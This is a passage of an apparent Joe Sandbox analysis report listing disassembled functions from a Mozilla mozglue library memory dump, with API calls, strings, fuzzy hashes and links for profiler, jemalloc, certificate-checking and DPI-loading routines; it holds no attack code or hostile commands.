MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 63f6ac4032cd796912983aa48e268e6ab745e3834178436f04110156bb8c4789
Instruction ID: dbcd13adabc6b76950f29d284a6a10ca0b35203b47f4cfe3f91f28bc11d472e7
Opcode Fuzzy Hash: 63f6ac4032cd796912983aa48e268e6ab745e3834178436f04110156bb8c4789
Instruction Fuzzy Hash: 0D222871908B009FFB009F76C45865A77B5AF9634CF554629E84AA7F82EB30E484CB53

Function 6C99B820 Relevance: 102.6, APIs: 56, Strings: 2, Instructions: 1128
threadtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 6C99B845
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8,?,?,00000000), ref: 6C99B852
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99B884
InitializeConditionVariable.KERNEL32(?), ref: 6C99B8D2
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?), ref: 6C99B9FD
GetCurrentThreadId.KERNEL32 ref: 6C99BA05
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8,?,?,00000000), ref: 6C99BA12
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,00000000), ref: 6C99BA27
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99BA4B
free.MOZGLUE(?), ref: 6C99C9C7
free.MOZGLUE(?), ref: 6C99C9DC

Strings

[I %d/%d] Stack sample too big for local storage, needed %u bytes, xrefs: 6C99C7DA
[I %d/%d] Stack sample too big for profiler storage, needed %u bytes, xrefs: 6C99C878

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID: [I %d/%d] Stack sample too big for local storage, needed %u bytes$[I %d/%d] Stack sample too big for profiler storage, needed %u bytes
API String ID: 656605770-2789026554
Opcode ID: 9d61be44a95b50d3e329c7fedd51e712ba87e9a0fda9c7dc4dcd002f89a0142d
Instruction ID: 33595b7736bef566392ee73db2a2ff1ddd88cb8ff5169e84838847bee9862f62
Opcode Fuzzy Hash: 9d61be44a95b50d3e329c7fedd51e712ba87e9a0fda9c7dc4dcd002f89a0142d
Instruction Fuzzy Hash: 9BA28D71A087808FD725CF28C88079BB7F5BFD9318F144A2DE899A7750DB70E9458B92

Function 6C966C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727
encryptionfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C966CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C966D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C966D26

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C966D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C966D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C966D73
free.MOZGLUE(00000000), ref: 6C966D80
CertGetNameStringW.CRYPT32 ref: 6C966DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C966DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C966DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C966DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C966E10
CryptMsgClose.CRYPT32(00000000), ref: 6C966E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C966E34
CreateFileW.KERNEL32 ref: 6C966EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C966F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C966F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C96709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C967103
free.MOZGLUE(00000000), ref: 6C967153
CloseHandle.KERNEL32(?), ref: 6C967176
__Init_thread_footer.LIBCMT ref: 6C967209
__Init_thread_footer.LIBCMT ref: 6C96723A
__Init_thread_footer.LIBCMT ref: 6C96726B
__Init_thread_footer.LIBCMT ref: 6C96729C
__Init_thread_footer.LIBCMT ref: 6C9672DC
__Init_thread_footer.LIBCMT ref: 6C96730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C9673C2
VerSetConditionMask.NTDLL ref: 6C9673F3
VerSetConditionMask.NTDLL ref: 6C9673FF
VerSetConditionMask.NTDLL ref: 6C967406
VerSetConditionMask.NTDLL ref: 6C96740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C96741A
moz_xmalloc.MOZGLUE(?), ref: 6C96755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C967568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C967585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C967598
free.MOZGLUE(00000000), ref: 6C9675AC

Part of subcall function 6C98AB89: EnterCriticalSection.KERNEL32(6C9DE370,?,?,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284), ref: 6C98AB94
Part of subcall function 6C98AB89: LeaveCriticalSection.KERNEL32(6C9DE370,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C98ABD1

Strings

(, xrefs: 6C96768A
SHA256, xrefs: 6C966EC0
CryptCATAdminReleaseCatalogContext, xrefs: 6C9672C8
wintrust.dll, xrefs: 6C9672CD

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 31be3325527c41bba886fa78816f1523284b1e0da2efbb39b157bee8857cada6
Instruction ID: 1af148cfaa595b17f45e2f4d97572ae5f9a3a2cedea4a4921c9536d7c3c72a20
Opcode Fuzzy Hash: 31be3325527c41bba886fa78816f1523284b1e0da2efbb39b157bee8857cada6
Instruction Fuzzy Hash: CB52D3B1A046149BFB21DF25CC85BAA77BCEF55708F104199E909A7A80DB70EBC4CF91

Function 6C986FF0 Relevance: 89.1, APIs: 39, Strings: 10, Instructions: 3347COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DE7DC), ref: 6C987019
LeaveCriticalSection.KERNEL32(6C9DE7DC), ref: 6C987061
EnterCriticalSection.KERNEL32(?), ref: 6C9871A4
LeaveCriticalSection.KERNEL32(?), ref: 6C98721D
memcpy.VCRUNTIME140(?,?,?), ref: 6C98723E
EnterCriticalSection.KERNEL32(?), ref: 6C98726C
memset.VCRUNTIME140(?,000000E5,000000FF), ref: 6C9872B2
LeaveCriticalSection.KERNEL32(?), ref: 6C98733F
EnterCriticalSection.KERNEL32(0000000C), ref: 6C9873E8
LeaveCriticalSection.KERNEL32(?), ref: 6C98961C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C989622
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C989642
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C98964F
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9896CE
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C9896DB
AcquireSRWLockExclusive.KERNEL32(6C9DE804), ref: 6C989747
GetSystemInfo.KERNEL32(?), ref: 6C989792
__Init_thread_footer.LIBCMT ref: 6C9897A5
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C9DE810,00000040), ref: 6C9897CF
InitializeCriticalSectionAndSpinCount.KERNEL32(6C9DE7B8,00001388), ref: 6C989838
InitializeCriticalSectionAndSpinCount.KERNEL32(6C9DE744,00001388), ref: 6C98984E
InitializeCriticalSectionAndSpinCount.KERNEL32(6C9DE784,00001388), ref: 6C989874
InitializeCriticalSectionAndSpinCount.KERNEL32(6C9DE7DC,00001388), ref: 6C989895

Strings

MOZ_CRASH(), xrefs: 6C989B42
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9899D2
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9899BD
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9899A8
: (malloc) Unsupported character in malloc options: ', xrefs: 6C989BF4
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C989993
Compile-time page size does not divide the runtime one., xrefs: 6C989B38
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C989933, 6C989A33, 6C989A4E
<jemalloc>, xrefs: 6C989B33, 6C989BE3
MALLOC_OPTIONS, xrefs: 6C9897CA

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$CountEnterInitializeK@1@LeaveMaybe@_RandomSpinUint64@mozilla@@$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable_errnomemcpymemset
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 4047164644-4173974723
Opcode ID: a507a74d4e20be4dad0cf0eb55c21720bf68a6f1198f689754bf576464d3bb77
Instruction ID: 4cfab2d6bf7420a4ecdf927842537904bdaab14e5361d5b89ce12db4493a5c79
Opcode Fuzzy Hash: a507a74d4e20be4dad0cf0eb55c21720bf68a6f1198f689754bf576464d3bb77
Instruction Fuzzy Hash: A253B171A067018FD704CF28C580715FBE5BF85728F2ACAADE8699B791D371E841CB91

Function 6C990DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C990F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C990F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C990FB7
EnterCriticalSection.KERNEL32(?), ref: 6C990FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C991031
LeaveCriticalSection.KERNEL32(?), ref: 6C9910D0
EnterCriticalSection.KERNEL32(?), ref: 6C99117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C991C39
EnterCriticalSection.KERNEL32(6C9DE744), ref: 6C993391
LeaveCriticalSection.KERNEL32(6C9DE744), ref: 6C9933CD
LeaveCriticalSection.KERNEL32(?), ref: 6C993431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C993437

Strings

MOZ_CRASH(), xrefs: 6C993950
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9937D2
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9937BD
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9937A8
: (malloc) Unsupported character in malloc options: ', xrefs: 6C993A02
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C993793
Compile-time page size does not divide the runtime one., xrefs: 6C993946
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C993559, 6C99382D, 6C993848
<jemalloc>, xrefs: 6C993941, 6C9939F1
MALLOC_OPTIONS, xrefs: 6C9935FE

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 7060e871f413c17f28846be2f9c2d54a9550233c13b660a913c89a1aadb6ba3c
Instruction ID: 88323adfe735787603888024a929bbd32d38c400ccc241e9f8c4747c956297d6
Opcode Fuzzy Hash: 7060e871f413c17f28846be2f9c2d54a9550233c13b660a913c89a1aadb6ba3c
Instruction Fuzzy Hash: F0539D71A05B018FD304CF29C540616FBE5BF8A728F2DC6ADE8699BB91D771E841CB81

Function 6C9B55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(user32,?,6C98E1A5), ref: 6C9B5606
LoadLibraryW.KERNEL32(gdi32,?,6C98E1A5), ref: 6C9B560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C9B5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C9B563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C9B566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C9B567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C9B5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C9B56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C9B56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C9B56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C9B56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C9B5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C9B572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C9B5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C9B5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C9B577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C9B5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C9B57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C9B57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C9B57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C9B57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C9B57FF

Strings

GetThreadDpiAwarenessContext, xrefs: 6C9B562D
GetSystemMetricsForDpi, xrefs: 6C9B5677
gdi32, xrefs: 6C9B560A
SetWindowPos, xrefs: 6C9B56F7
SetWindowLongPtrW, xrefs: 6C9B57B7
LoadIconW, xrefs: 6C9B575B
ReleaseDC, xrefs: 6C9B5742
DeleteObject, xrefs: 6C9B57F9
GetWindowDC, xrefs: 6C9B5710
StretchDIBits, xrefs: 6C9B57CC
ShowWindow, xrefs: 6C9B56DE
GetMonitorInfoW, xrefs: 6C9B57A2
user32, xrefs: 6C9B5601
FillRect, xrefs: 6C9B5729
CreateWindowExW, xrefs: 6C9B56C5
GetDpiForWindow, xrefs: 6C9B5690
EnableNonClientDpiScaling, xrefs: 6C9B5666
RegisterClassW, xrefs: 6C9B56AC
MonitorFromWindow, xrefs: 6C9B578D
CreateSolidBrush, xrefs: 6C9B57E4
LoadCursorW, xrefs: 6C9B5774
AreDpiAwarenessContextsEqual, xrefs: 6C9B5637

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: b62b0289e79b83f33e381221a6527ba5070d1c251e133c84b887ef19cecb3a91
Instruction ID: 41747918415cd83854961cde67794af9457b0b5d570bd113f65776845f780560
Opcode Fuzzy Hash: b62b0289e79b83f33e381221a6527ba5070d1c251e133c84b887ef19cecb3a91
Instruction Fuzzy Hash: B7513271719F03ABDB019F358D44A273ABCAB4B6897318965A911F3A51EFB0E840CF71

Function 6C9B34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B3EE2

Part of subcall function 6C9B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C9B61DD
Part of subcall function 6C9B6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C9B622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B4157

Part of subcall function 6C9B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C9B6250
Part of subcall function 6C9B6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9B6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9B4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9B484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9B4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9B4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9B4896
free.MOZGLUE ref: 6C9B489F

Strings

, xrefs: 6C9B4CD2

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: e29818880e9c058e7f45fe314385ccd4b9c3c8b7a9617262625459c37adfd8de
Instruction ID: 2024a2ce44dd57baca4eb525791026bf68a6069d6195df2565f20f8c78d6c700
Opcode Fuzzy Hash: e29818880e9c058e7f45fe314385ccd4b9c3c8b7a9617262625459c37adfd8de
Instruction Fuzzy Hash: A8F23D74908B808FC725CF28C08469AFBF1FF99348F158A5ED999A7711DB31E496CB42

Function 6C9664C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C9664DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C9664F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C966505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C966518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C96652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C96671C
GetCurrentProcess.KERNEL32 ref: 6C966724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C96672F
GetCurrentProcess.KERNEL32 ref: 6C966759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C966764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C966A80
GetSystemInfo.KERNEL32(?), ref: 6C966ABE
__Init_thread_footer.LIBCMT ref: 6C966AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C966AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C966AF7

Strings

_etoured.dll, xrefs: 6C9664ED
user32.dll, xrefs: 6C966526
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C966798
detoured.dll, xrefs: 6C9664DA
nvdxgiwrap.dll, xrefs: 6C966513
nvd3d9wrap.dll, xrefs: 6C966500

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 27dd945af1fe32d262ef0a761c6f670acab12c024bd204c79dc59807db2c3301
Instruction ID: f3bee4324432d92c21bcd1d3f6c1d1ac9eb2539a26f6e5108cf66aa5291763c1
Opcode Fuzzy Hash: 27dd945af1fe32d262ef0a761c6f670acab12c024bd204c79dc59807db2c3301
Instruction Fuzzy Hash: 74F1D3709056199FEF20CF26CD48B9AB7B9AF46318F1442D9D809E3B81D731EA84CF91

Function 6C9860A0 Relevance: 50.1, APIs: 22, Strings: 6, Instructions: 1142COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C9DE7DC), ref: 6C9860C9
LeaveCriticalSection.KERNEL32(6C9DE7DC), ref: 6C98610D
EnterCriticalSection.KERNEL32(?), ref: 6C98618C
LeaveCriticalSection.KERNEL32(?), ref: 6C9861F9

Strings

MOZ_CRASH(), xrefs: 6C986AB8
: (malloc) Unsupported character in malloc options: ', xrefs: 6C986B6A
Compile-time page size does not divide the runtime one., xrefs: 6C986AAE
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C986BC7, 6C986F97, 6C986FB2
MALLOC_OPTIONS, xrefs: 6C986888
<jemalloc>, xrefs: 6C986AA9, 6C986B59

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3168844106-429003945
Opcode ID: 7d1007c9df194d3a3bc3b820bbface37d1caa223a5f4aca1d52601a7c500ae32
Instruction ID: 5f412a5f79bb3721f2e4877629fc26ad606a218144d7b7f8dbb7b964545e3613
Opcode Fuzzy Hash: 7d1007c9df194d3a3bc3b820bbface37d1caa223a5f4aca1d52601a7c500ae32
